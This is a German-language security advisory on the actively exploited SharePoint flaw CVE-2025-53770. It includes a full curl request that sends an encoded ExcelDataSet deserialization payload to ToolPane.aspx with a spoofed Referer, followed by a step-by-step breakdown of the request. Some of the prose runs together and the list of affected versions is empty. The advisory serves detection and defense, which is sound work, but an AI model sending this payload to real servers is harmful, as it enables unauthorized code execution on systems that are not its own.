Die Sicherheitslücke CVE-2025-53770 ist eine kritische Schwachstelle in Microsoft SharePoint Servern, die aktiv ausgenutzt wird. Sie ermöglicht unauthentifizierte Remote Code Execution (RCE), wodurch Angreifer Schadcode auf betroffenen Systemen ausführen können.
Betroffen sind On-Premises-Versionen von:
Die Schwachstelle basiert auf einer fehlerhaften Deserialisierung nicht vertrauenswürdiger Daten und hat einen CVSS-Score von 9,8 (kritisch). Angreifer können MachineKeys extrahieren, um dauerhaften Zugriff zu erlangen, selbst nach Patches.
spinstall0.aspx, die auf eine erfolgreiche Ausnutzung hinweist.Die Schwachstelle ist eine Weiterentwicklung von CVE-2025-49704, die im Juli 2025 gepatcht wurde, und wird über den Endpunkt /_layouts/15/ToolPane.aspx mit einem gefälschten Referer-Header ausgenutzt. Angriffe wurden seit dem 18. Juli 2025 beobachtet, mit über 85 betroffenen Servern weltweit. CISA hat CVE-2025-53770 in den Katalog bekannter ausgenutzter Schwachstellen aufgenommen.
SharePoint Online in Microsoft 365 ist nicht betroffen. Unternehmen sollten unverzüglich handeln, da die Bedrohung aktiv genutzt wird. Für weitere Details besuchen Sie:
curl -sk -X POST 'https://testdomain.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx' \
-H 'Referer: /_layouts/SignOut.aspx' \
-H 'Content-Type: application/x-www-form-urlencoded' \
--data-urlencode 'MSOTlPn_Uri=https://testdomain.com' \
--data-urlencode 'MSOTlPn_DWP=
<%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
<%@ Register Tagprefix="asp" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %>
<asp:UpdateProgress ID="UpdateProgress1" DisplayAfter="10" runat="server" AssociatedUpdatePanelID="upTest">
<ProgressTemplate>
<div class="divWaiting">
<Scorecard:ExcelDataSet CompressedDataTable="H4sIAADEfmgA/4WRX2uzMBTG7/0Ukvs06ihjQb3ZbgobG1TYeO9OY6yBJpGTdHbfvudVu44x6FUkPn9+PEnK1nTdHuV8gE1P9uCCtKGFCBU7opNB9dpC4NYo9MF3kStvJen4rGKLZ4645bkU8c+c1Umalp33/0/62gGmC45pK9bA7qBZOpdI9OMrtpryM3ZR9RAee3B7HSpmXNAYdTuFTnGDVwvZKZiK9TEOUohxHFfj3crjXhRZlouPl+ftBMspIYJTVHlxEcQt13cdFTY6xHeEYdB4vaX7jet8vXERj8S/VeCcxicdtYrGuzf4OnhoSzGpftoaYykQ7FAXWbHm2T0v8qYoZP4g1+t/pbj+vyKIPxhKQUssEwvaeFpdTLOX4tfz18kZONVdDRICAAA=" DataTable-CaseSensitive="false" runat="server"></Scorecard:ExcelDataSet>
</div>
</ProgressTemplate>
</asp:UpdateProgress>' \
| grep -oP 'CompressedDataTable="\K[^&]+(?=")' \
| base64 -d 2>/dev/null \
| gzip -d 2>/dev/null \
| tee /tmp/sharepoint_decoded_payload.txt \
| grep -Ei 'IntruderScannerDetectionPayload|ExcelDataSet|divWaiting|ProgressTemplate|Scorecard'
Der Befehl zielt auf den Endpunkt /_layouts/15/ToolPane.aspx ab, der für die Ausnutzung von CVE-2025-53770 bekannt ist. Hier ist eine detaillierte Aufschlüsselung:
https://testdomain.com/_layouts/15/ToolPane.aspx mit den Parametern DisplayMode=Edit&a=/ToolPane.aspx.Referer-Header wird auf /_layouts/SignOut.aspx gesetzt, um die Schwachstelle zu umgehen, die eine spezifische Referer-Prüfung erfordert.MSOTlPn_DWP enthält bösartigen ASP.NET-Code, der die Scorecard:ExcelDataSet-Komponente verwendet. Der CompressedDataTable-Wert ist base64- und gzip-komprimiert und enthält potenziell schädlichen Code.CompressedDataTable-Wert, dekodiert ihn (base64 und gzip) und speichert das Ergebnis in /tmp/sharepoint_decoded_payload.txt. Anschließend wird nach spezifischen Schlüsselwörtern gegriffen, die auf einen erfolgreichen Exploit hinweisen könnten.